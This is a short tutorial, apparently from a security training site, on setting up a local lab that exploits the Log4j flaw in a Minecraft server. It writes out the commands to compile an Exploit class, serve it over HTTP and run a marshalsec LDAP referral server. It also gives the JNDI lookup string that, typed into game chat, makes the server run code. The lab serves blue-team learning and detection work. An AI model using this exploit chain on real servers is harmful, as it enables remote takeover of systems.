How to Create Home Lab for Log4j Exploit

Omer Gunal
Posted:
January 3, 2022
Home
Posts
Incident Responder
How to Create Home Lab for Log4j Exploit
Contents

Log4j RCE vulnerability is a popular vulnerability that everyone has probably heard of recently. For those wondering how the exploit of this vulnerability works and for those who want to test in a home environment, we will show you how to quickly set up a vulnerable lab for blue team members.

Not much technical details regarding this vulnerability will be shared here, we will only talk about how to set up the lab environment.

NOTE: Lab environment will be shown for Windows operating system and it is recommended to install it in virtual environment.

Requirements

  • Python

Stages:

  1. Preparing the Vulnerable Environment
  2. Attack Development
  3. Exploitation

Before we start, if you want to investigate Log4j Incident on SOC environment. You can use training platform LetsDefend

SIEM alert

Preparing the Vulnerable Environment

After downloading the requirements, we can start by running the Minecraft Server.

"C:\Program Files\Java\jdk1.8.0_181\bin\java.exe" -jar paper-1.12.2-1618.jar
minecraft server

After starting the server, we need to set the "online-mode" option to "false" in the "server.properties" file and restart the server again.

Attack Development

We have a Minecraft server waiting to be exploited, now we need to start preparing to exploit the vulnerability. First, we connect to the server (127.0.0.1/localhost) with the Minecraft client.

minecraft client

We are connected to the server, now we need to prepare the malicious code we want to run on the server.

java malicious code

We compile the exploit.java file and convert it into “.class”.

"C:\Program Files\Java\jdk1.8.0_181\bin\javac.exe" Exploit.java

Then, we are preparing a simple web service so that the Exploit.class file can be accessed remotely.

python web server

Finally, we can start our LDAP server and move on to the exploit stage.

"C:\Program Files\Java\jdk1.8.0_181\bin\java.exe" -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit

LDAP

Exploitation

Now, we can move on to the remote code execution phase. We can make "calc.exe" run on the server by entering the payload below in the return chat area of the Minecraft client.

${jndi:ldap://127.0.0.1:1389/exploit}

run calc.exe
(Server Logs)

(Web Service)

(LDAP)

Conclusion

We have created a vulnerable Minecraft server in 3 stages and ran code on the server as a player. You can develop various log analysis and intrusion detection methods with this lab environment you have created.

Share
letsdefend description card

You might also be interested in ...

Start learning cybersecurity today